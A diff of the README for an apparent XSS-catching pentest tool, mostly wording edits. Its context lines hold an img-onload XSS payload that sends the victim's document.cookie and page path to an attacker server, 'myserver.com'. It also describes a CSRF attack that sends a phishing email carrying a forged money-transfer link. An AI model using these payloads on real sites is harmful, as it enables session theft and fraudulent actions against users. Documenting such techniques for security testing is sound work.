ivan-sincek/xss-catcher/README.md

 <img src="https://github.com/favicon.ico" onload="this.src = 'https://myserver.com?site=' + encodeURIComponent(location.hostname) + location.pathname + '&data=' + encodeURIComponent(document.cookie);" hidden="hidden">
 ```

-First example above will send an HTTP POST request to your server with user-defined parameters as a form-data.
+First payload above will send an HTTP POST request to your server with user-defined parameters as a form-data.

-Second example above will send an HTTP GET request to your server with user-defined parameters in a query string (i.e. in a URL).
+Second payload above will send an HTTP GET request to your server with user-defined parameters in a query string (i.e., in a URL).

 ## Cross-Site Request Forgery (CSRF)

 Not necessarily used to steal HTTP cookies or to modify a web page.
-The goal is to just execute a forged query in the name of an already signed-in user.
+The goal is to just execute a forged query in the name/session/context of an already signed-in user.

-The simplest way to do so, is to send aphishing email containing a link such as `https://target.com/transfer.php?recipient=eve&amount=9000` (limited to HTTP GET request) to the victim or to store/hide a malicious code in either your target's website or your own website, and then send the less suspicious link.
+The simplest way to do so, is to send a phishing email containing a link such as `https://target.com/transfer.php?recipient=eve&amount=9000` (limited to HTTP GET request) to the victim or to store/hide a malicious code in either your target's website or your own website, and then send the less suspicious link.

 **Try to figure out what kind of data does a backend server accept before you try to forge/send anything.
 Is it a query string, form-data, raw data encoded in JSON, etc.?**